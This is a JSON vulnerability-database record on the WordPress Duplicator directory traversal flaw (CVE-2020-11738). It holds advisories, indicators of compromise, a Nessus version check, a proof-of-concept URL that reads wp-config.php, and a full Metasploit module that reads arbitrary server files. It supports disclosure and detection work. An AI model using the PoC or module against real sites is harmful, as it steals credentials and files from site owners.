{"attackerkb": [{"lastseen": "2020-12-19T00:16:40", "bulletinFamily": "info", "cvelist": ["CVE-2020-11738"], "description": "The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.\n\n \n**Recent assessments:** \n \n**kevthehermit** at April 14, 2020 2:38pm UTC reported:\n\nThis plugin is recorded as having over 1 Million installations via WordPress \u2013 <https://wordpress.org/plugins/duplicator/> \nIt has a free and a pro version with both being impacted.\n\nOther reporting suggests that there are around 170,000 active installations, with ~150,000 of these not on the latest version.\n\nThe vulnerability allows arbitrary file read of any file on disk in the context of the web application. This kind of attack _can_ lead to further compromise depending on its setup and configuration. Using this level of access can lead to database credentials being compromised which in turn can lead to further exploitation.\n\nThis exploit has been seen in active campaigns as reported by Wordfence \u2013 <https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/>\n\nIOCs shared by WordPress and replicated here for ease of discovery.\n\nIndicators Of Compromise (IOCs) \nThe following Indicators of Compromise (IOCs) can be used to determine if your site may have been attacked.\n\nTraffic logged from the threat actor\u2019s IP address should be considered suspicious:\n\n * 77.71.115.52 \n\n * Attacks in this campaign are issued via GET requests with the following query strings: \n\n * action=duplicator_download \n\n * file=/../wp-config.php \n\n * Note: Because this vulnerability can be exploited via WP AJAX, it\u2019s possible to exploit via POST request. 
In this case, it\u2019s possible for the action parameter to be passed in the POST body instead of the query string. This will prevent the action=duplicator_download string from appearing in HTTP logs. The file parameter must be passed as a query string, however, and is a reliable indicator.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 5\n", "modified": "2020-06-05T00:00:00", "published": "2020-04-13T00:00:00", "id": "AKB:7B975634-2048-4113-92B7-D2E74D1CEE74", "href": "https://attackerkb.com/topics/judia21wRt/cve-2020-11738", "type": "attackerkb", "title": "CVE-2020-11738", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2021-02-02T07:36:56", "description": "The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.", "edition": 9, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-04-13T22:15:00", "title": "CVE-2020-11738", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11738"], 
"modified": "2020-12-18T21:15:00", "cpe": [], "id": "CVE-2020-11738", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-11738", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}], "nessus": [{"lastseen": "2020-09-14T19:32:17", "description": "The WordPress application running on the remote host has a version of\nthe 'Duplicator' plugin that is prior to 1.3.28 and, thus, is\naffected by an unauthenticated arbitrary file download vulnerability that can allow\nthe attackers to download 'wp-config.php' and steal database credentials.", "edition": 8, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2020-02-21T00:00:00", "title": "WordPress Plugin 'Duplicator' < 1.3.28 Unauthenticated Arbitrary File Download", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-11738"], "modified": "2020-02-21T00:00:00", "cpe": ["cpe:/a:wordpress:wordpress"], "id": "WORDPRESS_PLUGIN_DUPLICATOR_1_3_28.NASL", "href": "https://www.tenable.com/plugins/nessus/133846", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133846);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/02\");\n\n script_cve_id(\"CVE-2020-11738\");\n\n script_name(english:\"WordPress Plugin 'Duplicator' < 1.3.28 Unauthenticated Arbitrary File Download\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable\nto unauthenticated arbitrary file download.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of\nthe 'Duplicator' plugin that is prior to 1.3.28 and, thus, is\naffected by an unauthenticated arbitrary file download vulnerability that can allow\nthe attackers to download 'wp-config.php' and steal database credentials.\");\n # 
https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8f2901d0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the 'Duplicator' plugin to version 1.3.28 or greater\nthrough the administrative dashboard.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11738\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'duplicator');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version': '1.0.0', 'max_version': '1.3.26', 'fixed_version' : '1.3.28' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "wpvulndb": [{"lastseen": "2021-02-15T22:04:18", "bulletinFamily": "software", "cvelist": ["CVE-2020-11738"], "description": "The issue is being actively exploited, and allows attackers to download arbitrary files, such as the wp-config.php file. According to the vendor, the vulnerability was only in two versions v1.3.24 and v1.3.26, the vulnerability wasn't present in versions 1.3.22 and before.\n\n### PoC\n\nhttp://www.example.com/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php\n", "modified": "2021-01-04T06:01:37", "id": "WPVDB-ID:35227C3A-E893-4C68-8CB6-FFE79115FB6D", "href": "https://wpscan.com/vulnerability/35227c3a-e893-4c68-8cb6-ffe79115fb6d", "published": "2020-02-19T00:00:00", "type": "wpvulndb", "title": "Duplicator 1.3.24 & 1.3.26 - Unauthenticated Arbitrary File Download", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "wpexploit": [{"lastseen": "2021-02-15T22:04:18", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-11738"], "description": "The issue is being actively exploited, and allows attackers to download arbitrary files, such as the wp-config.php file. 
According to the vendor, the vulnerability was only in two versions v1.3.24 and v1.3.26, the vulnerability wasn't present in versions 1.3.22 and before.\n", "modified": "2021-01-04T06:01:37", "published": "2020-02-19T00:00:00", "id": "WPEX-ID:35227C3A-E893-4C68-8CB6-FFE79115FB6D", "href": "", "type": "wpexploit", "title": "Duplicator 1.3.24 & 1.3.26 - Unauthenticated Arbitrary File Download", "sourceData": "http://www.example.com/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2020-12-18T19:23:24", "description": "", "published": "2020-12-18T00:00:00", "type": "packetstorm", "title": "WordPress Duplicator 1.3.26 Directory Traversal / File Read", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-11738"], "modified": "2020-12-18T00:00:00", "id": "PACKETSTORM:160621", "href": "https://packetstormsecurity.com/files/160621/WordPress-Duplicator-1.3.26-Directory-Traversal-File-Read.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Auxiliary::Report \ninclude Msf::Exploit::Remote::HTTP::Wordpress \ninclude Msf::Auxiliary::Scanner \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'WordPress Duplicator File Read Vulnerability', \n'Description' => %q{ This module exploits an unauthenticated directory traversal vulnerability in WordPress plugin 'Duplicator' plugin version 1.3.24-1.3.26, allowing arbitrary file read with the web server privileges. 
This vulnerability was being actively exploited when it was discovered.}, \n'References' => \n[ \n['CVE', '2020-11738'], \n['WPVDB', '10078'], \n['URL', 'https://snapcreek.com/duplicator/docs/changelog'] \n], \n'Author' => \n[ \n'Ramuel Gall', # Vulnerability discovery \n'Hoa Nguyen - SunCSR Team' # Metasploit module \n], \n'DisclosureDate' => 'Feb 19 2020', \n'License' => MSF_LICENSE \n)) \nregister_options( \n[ \nOptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), \nOptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 5]) \n]) \nend \ndef check \ncheck_plugin_version_from_readme('duplicator_download','1.3.27', '1.3.24') \nend \ndef run_host(ip) \ntraversal = '../' * datastore['DEPTH'] \nfilename = datastore['FILEPATH'] \nfilename = filename[1, filename.length] if filename =~ /^\\// \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path,'wp-admin', 'admin-ajax.php'), \n'vars_get' => \n{ \n'action' => 'duplicator_download', \n'file' => \"#{traversal}#{filename}\" \n} \n}) \nfail_with Failure::Unreachable, 'Connection failed' unless res \nfail_with Failure::NotVulnerable, 'Connection failed. Nothing was downloaded' if res.code != 200 \nfail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero? 
\nprint_status('Downloading file...') \nprint_line(\"\\n#{res.body}\\n\") \nfname = datastore['FILEPATH'] \npath = store_loot( \n'duplicator.traversal', \n'text/plain', \nip, \nres.body, \nfname \n) \nprint_good(\"File saved in: #{path}\") \nend \nend \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/160621/wpduplicator-traversal.rb.txt"}], "rapid7blog": [{"lastseen": "2021-01-08T22:48:37", "bulletinFamily": "info", "cvelist": ["CVE-2019-0230", "CVE-2020-11698", "CVE-2020-11738", "CVE-2020-17530", "CVE-2020-35234", "CVE-2020-8260"], "description": "## Struts2 Multi Eval OGNL RCE\n\n\n\nOur very own [zeroSteiner](<https://github.com/zeroSteiner>) added [`exploit/multi/http/struts2_multi_eval_ognl`](<https://github.com/rapid7/metasploit-framework/pull/14521>), which exploits Struts2 evaluating OGNL expressions in HTML attributes multiple times ([CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230?referrer=blog>) and [CVE-2020-17530](<https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530?referrer=blog>)). The [CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230?referrer=blog>) OGNL chain for remote code execution requires a one-time chain to enable the RCE gadget, which is handled automatically by the module. The OGNL gadget chain for [CVE-2020-17530](<https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530?referrer=blog>) will echo the command output. Both chains use a simple mathematical expression to ensure that evaluation occurs. These vulnerabilities are application dependent, and the user does need to know which CVE they are targeting. 
Setting the `NAME` parameter appropriately and using the check method to ensure evaluation takes place inside an HTML attribute are key to successful exploitation.\n\n## JuicyPotato-like Windows privilege escalation exploit\n\nExploit module [`exploits/windows/local/bits_ntlm_token_impersonation`](<https://github.com/rapid7/metasploit-framework/pull/14046>) was added by Metasploit contributor [C4ssandre](<https://github.com/C4ssandre>). It exploits BITS connecting to a local Windows Remote Management server (WinRM) at startup time. A fake WinRM server listening on port `5985` is started by a `DLL` loaded from a previous unprivileged meterpreter session. The fake server triggers BITS and then steals a `SYSTEM` token from the subsequent authentication request. The token is then used to start a new process and launch `powershell.exe` as the `SYSTEM` user. It downloads a malicious PowerShell script and executes it on a second local HTTP server, not writing any files to disk. The exploit is based on [decoder's PoC](<https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/>). It has been successfully tested on Windows 10 (10.0 Build 19041) 32 bits.\n\n## Pulse Connect Secure Gzip RCE\n\nMetasploit contributor [h00die](<https://github.com/h00die>) added an [exploit](<https://github.com/rapid7/metasploit-framework/pull/14368>) that targets Pulse Connect Secure server version `9.1R8` and earlier. The vulnerability was originally discovered by the [NCC Group](<https://research.nccgroup.com/2020/10/26/technical-advisory-pulse-connect-secure-rce-via-uncontrolled-gzip-extraction-cve-2020-8260/>). It achieves authenticated remote code execution as `root` by uploading an encrypted config that contains an overwrite for a Perl template file. This module was made possible by [rxwx](<https://github.com/rxrx>), who shared the encryption code with the author. Admin credentials are required for successful `root` access. 
The module has been tested against server version `9.1R8`.\n\n## New modules (8)\n\n * [SpamTitan Unauthenticated RCE](<https://github.com/rapid7/metasploit-framework/pull/14330>) by [Christophe De La Fuente](<https://github.com/cdelafuente-r7>) and [Felipe Molina](<https://github.com/felmoltor>), which exploits [CVE-2020-11698](<https://attackerkb.com/topics/ZM17ZOD4ym/cve-2020-11698?referrer=blog>)\n * [Pulse Secure VPN gzip RCE](<https://github.com/rapid7/metasploit-framework/pull/14368>) by [David Cash](<https://research.nccgroup.com/author/dcashncc/>), [Richard Warren](<https://uk.linkedin.com/in/rich-warren-437a7841>), [Spencer McIntyre](<https://github.com/zeroSteiner>), and [h00die](<https://github.com/h00die>), which exploits [CVE-2020-8260](<https://attackerkb.com/topics/MToDzANCY4/cve-2020-8260?referrer=blog>)\n * [Apache Struts 2 Forced Multi OGNL Evaluation](<https://github.com/rapid7/metasploit-framework/pull/14521>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>), Matthias Kaiser, [Spencer McIntyre](<https://github.com/zeroSteiner>), and [ka1n4t](<https://github.com/ka1n4t>), which exploits [CVE-2020-17530](<https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530?referrer=blog>) and [CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230?referrer=blog>)\n * [SYSTEM token impersonation through NTLM bits authentication on missing WinRM Service.](<https://github.com/rapid7/metasploit-framework/pull/14046>) by Andrea Pierini ([decoder](<https://github.com/decoder>)), Antonio Cocomazzi (splinter_code), [Cassandre](<https://github.com/C4ssandre>), and Roberto ([0xea31](<https://github.com/0xea31>))\n * [Shodan Host Port](<https://github.com/rapid7/metasploit-framework/pull/14429>) by [natto97](<https://github.com/natto97>)\n * [WordPress Duplicator File Read Vulnerability](<https://github.com/rapid7/metasploit-framework/pull/14497>) by Hoa Nguyen - SunCSR Team and Ramuel Gall, which exploits 
[CVE-2020-11738](<https://attackerkb.com/topics/judia21wRt/cve-2020-11738?referrer=blog>)\n * [WordPress Easy WP SMTP Password Reset](<https://github.com/rapid7/metasploit-framework/pull/14474>) by [h00die](<https://github.com/h00die>), which exploits [CVE-2020-35234](<https://attackerkb.com/topics/12eb7VUXHR/cve-2020-35234?referrer=blog>)\n * [WordPress Total Upkeep Unauthenticated Backup Downloader](<https://github.com/rapid7/metasploit-framework/pull/14568>) by Wadeek and [h00die](<https://github.com/h00die>)\n\n## Enhancements and features\n\n * PR [14566](<https://github.com/rapid7/metasploit-framework/pull/14566>) from [zeroSteiner](<https://github.com/zeroSteiner>) Module `auxiliary/server/socks_proxy` replaces `modules/auxiliary/server/socks4a.rb` and `modules/auxiliary/server/socks5.rb`.\n * PR [14538](<https://github.com/rapid7/metasploit-framework/pull/14538>) from [jmartin-r7](<https://github.com/jmartin-r7>) Improves Metasploit's XML importer error messages when data is not Base64 encoded.\n * PR [14528](<https://github.com/rapid7/metasploit-framework/pull/14528>) from [zeroSteiner](<https://github.com/zeroSteiner>) Clarifies Windows Meterpreter payloads description support of XP SP2 or newer.\n * PR [14522](<https://github.com/rapid7/metasploit-framework/pull/14522>) from [axxop](<https://github.com/axxop>) Replaces the hardcoded default Shiro encryption key with a new datastore option that allows users to specify rememberMe cookie encryption key.\n * PR [14517](<https://github.com/rapid7/metasploit-framework/pull/14517>) from [timwr](<https://github.com/timwr>) Changes the osx/x64/shell_reverse_tcp payload to be generated with Metasm and captures and sends STDERR to msfconsole.\n * PR [14509](<https://github.com/rapid7/metasploit-framework/pull/14509>) from [egypt](<https://github.com/egypt>) This adds a Java target to the Apache Solr RCE exploit module and fixes several payload issues.\n * PR 
[14444](<https://github.com/rapid7/metasploit-framework/pull/14444>) from [dwelch-r7](<https://github.com/dwelch-r7>) Adds a couple of missing methods from the remote data services for adding and deleting routes.\n\n## Bugs fixed\n\n * PR [14589](<https://github.com/rapid7/metasploit-framework/pull/14589>) from [timwr](<https://github.com/timwr>) Fixes a file download issue with the Android Meterpreter's download command.\n * PR [14532](<https://github.com/rapid7/metasploit-framework/pull/14532>) from [bcoles](<https://github.com/bcoles>) Fixes a NoMethodError exception caused by the Msf::Post::Common mixin not being included in post/android/capture/screen.\n * PR [14530](<https://github.com/rapid7/metasploit-framework/pull/14530>) from [jmartin-r7](<https://github.com/jmartin-r7>) Fixes a failing test on macOS caused by IPv6 vs IPv4 result precedence.\n * PR [14475](<https://github.com/rapid7/metasploit-framework/pull/14475>) from [dwelch-r7](<https://github.com/dwelch-r7>) Fixes the EICAR canary check.\n * PR [14334](<https://github.com/rapid7/metasploit-framework/pull/14334>) from [Summus-git](<https://github.com/Summus-git>) Fixes a x86 linux bind shell payloads socket closing bug.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.22...6.0.25](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-12-17T10%3A49%3A21-06%3A00..2021-01-07T10%3A58%3A16%2B00%3A00%22>)\n * [Full diff 6.0.22...6.0.25](<https://github.com/rapid7/metasploit-framework/compare/6.0.22...6.0.25>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2021-01-08T19:54:36", "published": "2021-01-08T19:54:36", "id": "RAPID7BLOG:5482AC1594C82A230828023816657B57", "href": "https://blog.rapid7.com/2021/01/08/metasploit-wrap-up-93/", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}